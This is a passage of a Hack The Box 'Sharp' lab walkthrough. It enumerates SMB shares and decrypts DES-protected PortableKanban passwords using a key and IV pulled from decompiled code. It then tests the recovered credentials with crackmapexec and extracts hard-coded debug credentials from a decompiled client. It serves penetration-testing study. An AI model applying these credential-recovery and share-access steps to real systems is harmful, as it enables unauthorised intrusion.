/home/samiko/Desktop/oscp-prep/HTB/Sharp/mnt cifs rw,relatime,vers=3.1.1,sec=none,cache=strict,uid=0,noforceuid,gid=0,noforcegid,addr=10.10.10.219,file_mode=0755,dir_mode=0755,soft,nounix,serverino,mapposix,rsize=4194304,wsize=4194304,bsize=1048576,echo_interval=60,actimeo=1 0 0</span></span></span></code></pre></li><li id="https://www.notion.so/2716de12745c4de4a413f077803baaff" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The SMB share was mounted successfully, we can also make a local copy of the share for easier access and edit:</span></span><div id="https://www.notion.so/526d131bf35a46db8771556552cb6462" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ mkdir smb && cd smb && smbget -a -R smb://10.10.10.219/kanban</code></span></span></p></div><div id="https://www.notion.so/9b1289df514f4294a493ed0ddb7595fe" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ls -la ./mnt</code></span></span></p></div><pre id="https://www.notion.so/b05a17a2c12140ee92c29fcf7617b309" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>-rwxr-xr-x 1 root root 58368 Feb 27 2013 CommandLine.dll
-rwxr-xr-x 1 root root 141312 Nov 9 2017 CsvHelper.dll
-rwxr-xr-x 1 root root 456704 Jun 23 2016 DotNetZip.dll
drwxr-xr-x 2 root root 0 Nov 15 05:27 Files
-rwxr-xr-x 1 root root 23040 Nov 24 2017 Itenso.Rtf.Converter.Html.dll
-rwxr-xr-x 1 root root 75776 Nov 24 2017 Itenso.Rtf.Interpreter.dll
-rwxr-xr-x 1 root root 32768 Nov 24 2017 Itenso.Rtf.Parser.dll
-rwxr-xr-x 1 root root 19968 Nov 24 2017 Itenso.Sys.dll
-rwxr-xr-x 1 root root 376832 Nov 24 2017 MsgReader.dll
-rwxr-xr-x 1 root root 133296 Jul 4 2014 Ookii.Dialogs.dll
-rwxr-xr-x 1 root root 2558011 Nov 13 06:34 pkb.zip
drwxr-xr-x 2 root root 0 Nov 13 06:35 Plugins
-rwxr-xr-x 1 root root 5819 Nov 15 05:26 PortableKanban.cfg
-rwxr-xr-x 1 root root 118184 Jan 5 2018 PortableKanban.Data.dll
-rwxr-xr-x 1 root root 1878440 Jan 5 2018 PortableKanban.exe
-rwxr-xr-x 1 root root 31144 Jan 5 2018 PortableKanban.Extensions.dll
-rwxr-xr-x 1 root root 2080 Nov 15 05:26 PortableKanban.pk3
-rwxr-xr-x 1 root root 2080 Nov 15 05:25 PortableKanban.pk3.bak
-rwxr-xr-x 1 root root 34 Nov 15 05:26 PortableKanban.pk3.md5
-rwxr-xr-x 1 root root 413184 Sep 6 2017 ServiceStack.Common.dll
-rwxr-xr-x 1 root root 137216 Sep 6 2017 ServiceStack.Interfaces.dll
-rwxr-xr-x 1 root root 292352 Sep 6 2017 ServiceStack.Redis.dll
-rwxr-xr-x 1 root root 411648 Sep 6 2017 ServiceStack.Text.dll
-rwxr-xr-x 1 root root 1050092 Jan 5 2018 'User Guide.pdf'</span></span></span></code></pre></li><li id="https://www.notion.so/6780e45766324003868ed6bb150c9029" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Share contains setup files for PortableKanban, particular files of interest are:
</span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">PortableKanban.pk3</code></span><span class="SemanticString">, </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">PortableKanban.pk3.bak</code></span><span class="SemanticString">, </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">PortableKanban.cfg</code></span><span class="SemanticString">, </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">User Guide.pdf</code></span></span></li><li id="https://www.notion.so/8263c889345e47279099d0db3aad869a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">PortableKanban.pk3</code></span><span class="SemanticString"> and </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">PortableKanban.pk3.bak</code></span><span class="SemanticString"> are identical files:</span></span><div id="https://www.notion.so/e706d7be9eab4a5aa0a82a16869b83c8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ diff PortableKanban.pk3 PortableKanban.pk3.bak</code></span></span></p></div></li><li id="https://www.notion.so/e28315876c6540f68cf49e6a549a7b3c" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found encrypted credentials in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">PortableKanban.pk3</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/89d91bec3f724c79be7f0508bc4c4478" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token property">"Users"</span><span class="token operator">:</span>
<span class="token punctuation">[</span>
<span class="token punctuation">{</span>
<span class="token property">"Id"</span><span class="token operator">:</span><span class="token string">"e8e29158d70d44b1a1ba4949d52790a0"</span><span class="token punctuation">,</span>
<span class="token property">"Name"</span><span class="token operator">:</span><span class="token string">"Administrator"</span><span class="token punctuation">,</span>
<span class="token property">"Initials"</span><span class="token operator">:</span><span class="token string">""</span><span class="token punctuation">,</span>
<span class="token property">"Email"</span><span class="token operator">:</span><span class="token string">""</span><span class="token punctuation">,</span>
<span class="token property">"EncryptedPassword"</span><span class="token operator">:</span><span class="token string">"k+iUoOvQYG98PuhhRC7/rg=="</span><span class="token punctuation">,</span>
<span class="token property">"Role"</span><span class="token operator">:</span><span class="token string">"Admin"</span><span class="token punctuation">,</span>
<span class="token property">"Inactive"</span><span class="token operator">:</span><span class="token boolean">false</span><span class="token punctuation">,</span>
<span class="token property">"TimeStamp"</span><span class="token operator">:</span><span class="token number">637409769245503731</span>
<span class="token punctuation">}</span><span class="token punctuation">,</span>
<span class="token punctuation">{</span>
<span class="token property">"Id"</span><span class="token operator">:</span><span class="token string">"0628ae1de5234b81ae65c246dd2b4a21"</span><span class="token punctuation">,</span>
<span class="token property">"Name"</span><span class="token operator">:</span><span class="token string">"lars"</span><span class="token punctuation">,</span>
<span class="token property">"Initials"</span><span class="token operator">:</span><span class="token string">""</span><span class="token punctuation">,</span>
<span class="token property">"Email"</span><span class="token operator">:</span><span class="token string">""</span><span class="token punctuation">,</span>
<span class="token property">"EncryptedPassword"</span><span class="token operator">:</span><span class="token string">"Ua3LyPFM175GN8D3+tqwLA=="</span><span class="token punctuation">,</span>
<span class="token property">"Role"</span><span class="token operator">:</span><span class="token string">"User"</span><span class="token punctuation">,</span>
<span class="token property">"Inactive"</span><span class="token operator">:</span><span class="token boolean">false</span><span class="token punctuation">,</span>
<span class="token property">"TimeStamp"</span><span class="token operator">:</span><span class="token number">637409769265925613</span>
<span class="token punctuation">}</span>
<span class="token punctuation">]</span></span></span></span></code></pre></li><li id="https://www.notion.so/d60bed825c3f4c69a044b6167b0315c2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">User's name is Lars.</span></span></li><li id="https://www.notion.so/6fa0d970d6424cf58733fc29aa63775e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found encrypted credentials:</span></span><div id="https://www.notion.so/eebe8f9db39749dab0de453047989e8b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Administrator:k+iUoOvQYG98PuhhRC7/rg==</code></span></span></p></div><div id="https://www.notion.so/9f4e42356602442282fa8c8d0f25df4e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">lars:Ua3LyPFM175GN8D3+tqwLA==</code></span></span></p></div></li><li id="https://www.notion.so/c81ada130ad0437ca4ccbbb0fdc2df64" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Encrypted password looks similar to base64 with the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">==</code></span><span class="SemanticString"> padding at the end, though decoding did not yield anything.</span></span></li><li id="https://www.notion.so/c42f4cc411104c55855455ad1884f572" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found possible machine name in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">PortableKanban.cfg</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/5150127a4b714ed2af18fc8f4d1e60cd" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">DESKTOP-86DR53S</code></span></span></p></div></li></ul><div id="https://www.notion.so/087d23abc6814f6c926c03be1d40ece9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Reversing PortableKanban.Data.dll with dotPeek:</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/a0cf5540905d43ccacf8fc50b5841771" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found key and initialisation vector used for encrypting password in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Crypto.cs</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/416a71cb2c7143a9a7947a52bf1acc7d" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token class-name"><span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span></span> _rgbKey <span class="token operator">=</span> Encoding<span class="token punctuation">.</span>ASCII<span class="token punctuation">.</span><span class="token function">GetBytes</span><span class="token punctuation">(</span><span class="token string">"7ly6UznJ"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token class-name"><span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span></span> _rgbIV <span class="token operator">=</span> Encoding<span class="token punctuation">.</span>ASCII<span class="token punctuation">.</span><span class="token function">GetBytes</span><span class="token punctuation">(</span><span class="token string">"XuVUm5fR"</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></span></span></code></pre></li><li id="https://www.notion.so/de058d30df9647ecb3fc15ecacc1d942" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Encrypt</code></span><span class="SemanticString"> and </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Decrypt</code></span><span class="SemanticString"> functions in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Crypto.cs</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/c8b08dac0fd640fdad6cce97cf373bf5" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token return-type class-name"><span class="token keyword">string</span></span> <span class="token function">Encrypt</span><span class="token punctuation">(</span><span class="token class-name"><span class="token keyword">string</span></span> originalString<span class="token punctuation">)</span>
<span class="token punctuation">{</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token keyword">string</span><span class="token punctuation">.</span><span class="token function">IsNullOrEmpty</span><span class="token punctuation">(</span>originalString<span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">return</span> <span class="token keyword">string</span><span class="token punctuation">.</span>Empty<span class="token punctuation">;</span>
<span class="token keyword">try</span>
<span class="token punctuation">{</span>
<span class="token class-name">DESCryptoServiceProvider</span> cryptoServiceProvider <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">DESCryptoServiceProvider</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">MemoryStream</span> memoryStream <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">MemoryStream</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">CryptoStream</span> cryptoStream <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">CryptoStream</span><span class="token punctuation">(</span><span class="token punctuation">(</span>Stream<span class="token punctuation">)</span> memoryStream<span class="token punctuation">,</span> cryptoServiceProvider<span class="token punctuation">.</span><span class="token function">CreateEncryptor</span><span class="token punctuation">(</span>Crypto<span class="token punctuation">.</span>_rgbKey<span class="token punctuation">,</span> Crypto<span class="token punctuation">.</span>_rgbIV<span class="token punctuation">)</span><span class="token punctuation">,</span> CryptoStreamMode<span class="token punctuation">.</span>Write<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">StreamWriter</span> streamWriter <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">StreamWriter</span><span class="token punctuation">(</span><span class="token punctuation">(</span>Stream<span class="token punctuation">)</span> cryptoStream<span class="token punctuation">)</span><span class="token punctuation">;</span>
streamWriter<span class="token punctuation">.</span><span class="token function">Write</span><span class="token punctuation">(</span>originalString<span class="token punctuation">)</span><span class="token punctuation">;</span>
streamWriter<span class="token punctuation">.</span><span class="token function">Flush</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
cryptoStream<span class="token punctuation">.</span><span class="token function">FlushFinalBlock</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
streamWriter<span class="token punctuation">.</span><span class="token function">Flush</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">return</span> Convert<span class="token punctuation">.</span><span class="token function">ToBase64String</span><span class="token punctuation">(</span>memoryStream<span class="token punctuation">.</span><span class="token function">GetBuffer</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token keyword">int</span><span class="token punctuation">)</span> memoryStream<span class="token punctuation">.</span>Length<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token keyword">catch</span> <span class="token punctuation">(</span><span class="token class-name">Exception</span> ex<span class="token punctuation">)</span>
<span class="token punctuation">{</span>
<span class="token keyword">return</span> <span class="token keyword">string</span><span class="token punctuation">.</span>Empty<span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span></span></span></span></code></pre><pre id="https://www.notion.so/0399b2b3a44f46019f997b191ab166de" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token return-type class-name"><span class="token keyword">string</span></span> <span class="token function">Decrypt</span><span class="token punctuation">(</span><span class="token class-name"><span class="token keyword">string</span></span> cryptedString<span class="token punctuation">)</span>
<span class="token punctuation">{</span>
<span class="token keyword">try</span>
<span class="token punctuation">{</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token keyword">string</span><span class="token punctuation">.</span><span class="token function">IsNullOrEmpty</span><span class="token punctuation">(</span>cryptedString<span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">return</span> <span class="token keyword">string</span><span class="token punctuation">.</span>Empty<span class="token punctuation">;</span>
<span class="token class-name">DESCryptoServiceProvider</span> cryptoServiceProvider <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">DESCryptoServiceProvider</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">return</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">StreamReader</span><span class="token punctuation">(</span><span class="token punctuation">(</span>Stream<span class="token punctuation">)</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">CryptoStream</span><span class="token punctuation">(</span><span class="token punctuation">(</span>Stream<span class="token punctuation">)</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">MemoryStream</span><span class="token punctuation">(</span>Convert<span class="token punctuation">.</span><span class="token function">FromBase64String</span><span class="token punctuation">(</span>cryptedString<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span> cryptoServiceProvider<span class="token punctuation">.</span><span class="token function">CreateDecryptor</span><span class="token punctuation">(</span>Crypto<span class="token punctuation">.</span>_rgbKey<span class="token punctuation">,</span> Crypto<span class="token punctuation">.</span>_rgbIV<span class="token punctuation">)</span><span class="token punctuation">,</span> CryptoStreamMode<span class="token punctuation">.</span>Read<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">ReadToEnd</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token keyword">catch</span> <span class="token punctuation">(</span><span class="token class-name">Exception</span> ex<span class="token punctuation">)</span>
<span class="token punctuation">{</span>
<span class="token keyword">return</span> <span class="token keyword">string</span><span class="token punctuation">.</span>Empty<span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span></span></span></span></code></pre></li><li id="https://www.notion.so/50b31fab0c6d4d9b96239f561fbe2c64" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The password is encrypted with DES, then encoded in base64.</span></span></li><li id="https://www.notion.so/c332c547aa5842b4a5bee6dc6c6a3b6f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Since we know the key and IV, we can decrypt the passwords after decoding from base64 using CyberChef:</span></span><div id="https://www.notion.so/4219c753d39e4fe0bc7df4ad56fdd8b8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">administrator:G2@$btRSHJYTarg</code></span></span></p></div><div id="https://www.notion.so/5add20e7d66747409f68a4ade374f14d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">lars:G123HHrth234gRG</code></span></span></p></div></li><li id="https://www.notion.so/6cc60cb4a2ab4d53bce6485811385788" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Test credentials:</span></span><div id="https://www.notion.so/42d8729486b0449a87358d28b107d894" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec winrm 10.10.10.219 -u administrator -p G2@\$btRSHJYTarg</code></span></span></p></div><pre id="https://www.notion.so/6159a863a64a4c27bd34b77bf88edb23" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>WINRM 10.10.10.219 5985 SHARP [*] Windows 10.0 Build 17763 (name:SHARP) (domain:Sharp)
WINRM 10.10.10.219 5985 SHARP [*] http://10.10.10.219:5985/wsman
WINRM 10.10.10.219 5985 SHARP [-] Sharp\administrator:G2@$btRSHJYTarg</span></span></span></code></pre><div id="https://www.notion.so/07ebfc33e1444a5786e72ee9f9761a37" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec winrm 10.10.10.219 -u lars -p G123HHrth234gRG</code></span></span></p></div><pre id="https://www.notion.so/3c7aa8cd63f14931b721b6060bd01d7c" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>WINRM 10.10.10.219 5985 SHARP [*] Windows 10.0 Build 17763 (name:SHARP) (domain:Sharp)
WINRM 10.10.10.219 5985 SHARP [*] http://10.10.10.219:5985/wsman
WINRM 10.10.10.219 5985 SHARP [-] Sharp\lars:G123HHrth234gRG</span></span></span></code></pre><div id="https://www.notion.so/8a008669ef214e80b0fd1e647d3ff57c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec smb 10.10.10.219 -u administrator -p G2@\$btRSHJYTarg --shares</code></span></span></p></div><pre id="https://www.notion.so/8cd3a0c260944d26bfbf1b01edde6d98" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.10.219 445 SHARP [*] Windows 10.0 Build 17763 x64 (name:SHARP) (domain:Sharp) (signing:False) (SMBv1:False)
SMB 10.10.10.219 445 SHARP [-] Sharp\administrator:G2@$btRSHJYTarg STATUS_LOGON_FAILURE
SMB 10.10.10.219 445 SHARP [-] Error enumerating shares: STATUS_USER_SESSION_DELETED</span></span></span></code></pre><div id="https://www.notion.so/98d333139112419586ccf7785368c225" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec smb 10.10.10.219 -u lars -p G123HHrth234gRG --shares</code></span></span></p></div><pre id="https://www.notion.so/3012255b65634062938ac0036a6e300b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.10.219 445 SHARP [*] Windows 10.0 Build 17763 x64 (name:SHARP) (domain:Sharp) (signing:False) (SMBv1:False)
SMB 10.10.10.219 445 SHARP [+] Sharp\lars:G123HHrth234gRG
SMB 10.10.10.219 445 SHARP [+] Enumerated shares
SMB 10.10.10.219 445 SHARP Share Permissions Remark
SMB 10.10.10.219 445 SHARP ----- ----------- ------
SMB 10.10.10.219 445 SHARP ADMIN$ Remote Admin
SMB 10.10.10.219 445 SHARP C$ Default share
SMB 10.10.10.219 445 SHARP dev READ
SMB 10.10.10.219 445 SHARP IPC$ READ Remote IPC
SMB 10.10.10.219 445 SHARP kanban</span></span></span></code></pre></li><li id="https://www.notion.so/ff09764067a9473b872180de626e5fda" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">New SMB share access using Lars' credentials:
</span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">dev</code></span><span class="SemanticString">, </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">IPC$</code></span></span></li></ul><h2 id="https://www.notion.so/fd53e962089a4c0f86e560e7e98da435" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/fd53e962089a4c0f86e560e7e98da435"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Exploitation</span></span></h2><div id="https://www.notion.so/f923bf726d5d4312b463042a0d0eb3e6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Exploring developer SMB share:</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/8c6bec12e4814a2a9849fce9f5292163" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Mount into </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">dev</code></span><span class="SemanticString"> share:</span></span><div id="https://www.notion.so/fdfe9c043c9244cabde0ee939f346f5b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo mount -t cifs -o username=lars,password=G123HHrth234gRG //10.10.10.219/dev ./mnt</code></span></span></p></div><div id="https://www.notion.so/e3d217adf3c441ada360e3ecabbd2712" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ls -la ./mnt</code></span></span></p></div><pre id="https://www.notion.so/5cec5a8886cf409799785232be50cc93" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>-rwxr-xr-x 1 root root 5632 Nov 15 20:55 Client.exe
-rwxr-xr-x 1 root root 70 Nov 16 00:29 notes.txt
-rwxr-xr-x 1 root root 4096 Nov 15 20:55 RemotingLibrary.dll
-rwxr-xr-x 1 root root 6144 Nov 16 22:25 Server.exe</span></span></span></code></pre></li><li id="https://www.notion.so/395cfc448b934aaeaf8af8e6783d2d74" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Make local copy:</span></span><div id="https://www.notion.so/6ed352db3c1041d68b45ae0009333d4a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ mkdir ./smb/dev && cp ./mnt/* ./smb/dev/</code></span></span></p></div></li><li id="https://www.notion.so/163a8f46564f4291a94640bc77906c7b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">notes.txt</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/0746eb4fabf944f3b4fffb92ae6b2970" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Todo:
Migrate from .Net remoting to WCF
Add input validation</span></span></span></code></pre></li></ul><div id="https://www.notion.so/0f64f5b18eef4815990bae459b5f1ccf" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Reversing mysterious Client/Server application with dotPeek:</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/8ec8647b2fc74e93a538f7b27aa7c60a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found endpoint and debug user credentials in decompiled </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Client.exe</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/43294eef44494ca493b555cf99df5ed3" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token return-type class-name"><span class="token keyword">void</span></span> <span class="token function">Main</span><span class="token punctuation">(</span><span class="token class-name"><span class="token keyword">string</span><span class="token punctuation">[</span><span class="token punctuation">]</span></span> args<span class="token punctuation">)</span>
<span class="token punctuation">{</span>
ChannelServices<span class="token punctuation">.</span><span class="token function">RegisterChannel</span><span class="token punctuation">(</span><span class="token punctuation">(</span>IChannel<span class="token punctuation">)</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">TcpChannel</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token boolean">true</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">IDictionary</span> channelSinkProperties <span class="token operator">=</span> ChannelServices<span class="token punctuation">.</span><span class="token function">GetChannelSinkProperties</span><span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token keyword">object</span><span class="token punctuation">)</span> <span class="token punctuation">(</span>RemotingSample<span class="token punctuation">.</span>Remoting<span class="token punctuation">)</span> Activator<span class="token punctuation">.</span><span class="token function">GetObject</span><span class="token punctuation">(</span><span class="token keyword">typeof</span> <span class="token punctuation">(</span><span class="token type-expression class-name">RemotingSample<span class="token punctuation">.</span>Remoting</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">"tcp://localhost:8888/SecretSharpDebugApplicationEndpoint"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
channelSinkProperties<span class="token punctuation">[</span><span class="token punctuation">(</span><span class="token keyword">object</span><span class="token punctuation">)</span> <span class="token string">"username"</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token keyword">object</span><span class="token punctuation">)</span> <span class="token string">"debug"</span><span class="token punctuation">;</span>
channelSinkProperties<span class="token punctuation">[</span><span class="token punctuation">(</span><span class="token keyword">object</span><span class="token punctuation">)</span> <span class="token string">"password"</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token keyword">object</span><span class="token punctuation">)</span> <span class="token string">"SharpApplicationDebugUserPassword123!"</span><span class="token punctuation">;</span>
